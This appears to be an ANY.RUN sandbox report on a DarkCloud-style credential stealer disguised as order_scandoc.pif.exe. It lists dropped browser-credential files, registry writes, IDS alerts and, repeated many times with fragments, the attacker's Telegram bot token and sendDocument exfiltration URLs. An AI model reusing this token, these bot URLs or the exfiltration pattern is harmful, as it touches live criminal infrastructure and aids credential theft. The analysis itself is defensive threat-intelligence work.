End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admi
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocu
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138 HTTP/1.1
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
(PID) Process(2064) ykwhenrvO.exe
Telegram-Tokens (1)8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Telegram-Info-Links
8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
Get info about bothttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getMe
Get incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getUpdates
Get webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
Token8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI
End-PointsendDocument
Args
chat_id (1)6683518699
caption (1)PW_DESKTOP-JGLLJLD\admin\176.128.145.138
Telegram-Responses
oktrue
result
message_id71
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644810
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANHaNLKSsh54d3cGbcGdm5I_rb5n98AAiYYAAJ-EphSRWWUz4l4L7o2BA
file_unique_idAgADJhgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
oktrue
result
message_id70
from
id8465292288
is_bottrue
first_nameyaking001
usernameyaking001_bot
chat
id6683518699
first_namePascal
last_nameJohn
usernamePascaledums
typeprivate
date1758644806
document
file_nameDESKTOP-JGLLJLD-admin.html
mime_typeapplication/octet-stream
file_idBQACAgQAAxkDAANGaNLKRovKk5Yqrbbgq5yEr-Og5mQAAiUYAAJ-EphSuAFlTWqOkZo2BA
file_unique_idAgADJRgAAn4SmFI
file_size136
captionPW_DESKTOP-JGLLJLD\admin\176.128.145.138
caption_entities
offset25
length15
typeurl
6264"C:\Users\admin\Desktop\order_scandoc.pif.exe" C:\Users\admin\Desktop\order_scandoc.pif.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\order_scandoc.pif.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
Total events
7 496
Read events
7 493
Write events
3
Delete events
0

Modification events

(PID) Process:(2064) ykwhenrvO.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2064) ykwhenrvO.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2064) ykwhenrvO.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
1
Suspicious files
3
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2064ykwhenrvO.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\WebDatabinary
MD5:983A5B37990067066CF80EDDF2426994
SHA256:E499265D1817B9CD52AC502B7BE6DEF5174478CAAAB7DADE263A7754E4E838D3
2064ykwhenrvO.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\keyDBPath.dbbinary
MD5:0FF3BCDD0BE077B9EB8194B5C09F453C
SHA256:225D669E47EB14D8C969799C92AAEF27B66CD984872EA09284E48DB46521E651
2064ykwhenrvO.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\LoginDatabinary
MD5:A45465CDCDC6CB30C8906F3DA4EC114C
SHA256:4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
6264order_scandoc.pif.exeC:\Users\Public\ykwhenrvO.exeexecutable
MD5:C116D3604CEAFE7057D77FF27552C215
SHA256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
2064ykwhenrvO.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\DESKTOP-JGLLJLD-admin\DESKTOP-JGLLJLD-admin.htmltext
MD5:64CA6CC1A4933D8A20585E027DA46F4C
SHA256:52E5A4791F89A6CA5A8D0412685DAF022876AEB2F6B11C40D0538194C0EC016E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
28
TCP/UDP connections
46
DNS requests
19
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
2.16.16.148:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
2.16.16.148:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1964
RUXIMICS.exe
GET
200
2.16.16.148:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
23.200.213.221:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
23.200.213.221:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1964
RUXIMICS.exe
GET
200
23.200.213.221:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2064
ykwhenrvO.exe
GET
200
162.55.60.2:80
http://showip.net/
unknown
shared
POST
200
20.190.159.71:443
https://login.live.com/RST2.srf
unknown
xml
1.24 Kb
POST
200
149.154.167.99:443
https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/sendDocument?chat_id=6683518699&caption=PW_DESKTOP-JGLLJLD\admin\176.128.145.138
unknown
binary
597 b
POST
200
149.154.167.99:443
https://api.telegram.org/bot8465292288:AAFxpuUMa_h_H4JaedS1GzXtfpxQHRQh-AI/sendDocument?chat_id=6683518699&caption=PW_DESKTOP-JGLLJLD\admin\176.128.145.138
unknown
binary
597 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5944
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1964
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1268
svchost.exe
2.16.16.148:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
2.16.16.148:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
1964
RUXIMICS.exe
2.16.16.148:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
1268
svchost.exe
23.200.213.221:80
www.microsoft.com
AKAMAI-AS
FR
whitelisted
5944
MoUsoCoreWorker.exe
23.200.213.221:80
www.microsoft.com
AKAMAI-AS
FR
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.174
whitelisted
crl.microsoft.com
  • 2.16.16.148
  • 2.16.16.155
whitelisted
www.microsoft.com
  • 23.200.213.221
whitelisted
showip.net
  • 162.55.60.2
shared
api.telegram.org
  • 149.154.167.220
whitelisted
self.events.data.microsoft.com
  • 20.42.65.89
whitelisted
activation-v2.sls.microsoft.com
  • 4.154.209.85
whitelisted
login.live.com
  • 20.190.160.132
  • 20.190.160.3
  • 40.126.32.68
  • 40.126.32.138
  • 40.126.32.72
  • 20.190.160.65
  • 20.190.160.2
  • 40.126.32.76
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted

Threats

PID
Process
Class
Message
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2064
ykwhenrvO.exe
Attempted Information Leak
ET INFO IP Check Domain (showip in HTTP Host)
2064
ykwhenrvO.exe
A Network Trojan was detected
STEALER [ANY.RUN] DarkCloud External IP Check
2064
ykwhenrvO.exe
Device Retrieving External IP Address Detected
ET HUNTING [ANY.RUN] DARKCLOUD Style External IP Check
2200
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
2064
ykwhenrvO.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
2064
ykwhenrvO.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
order_scandoc.pif.exe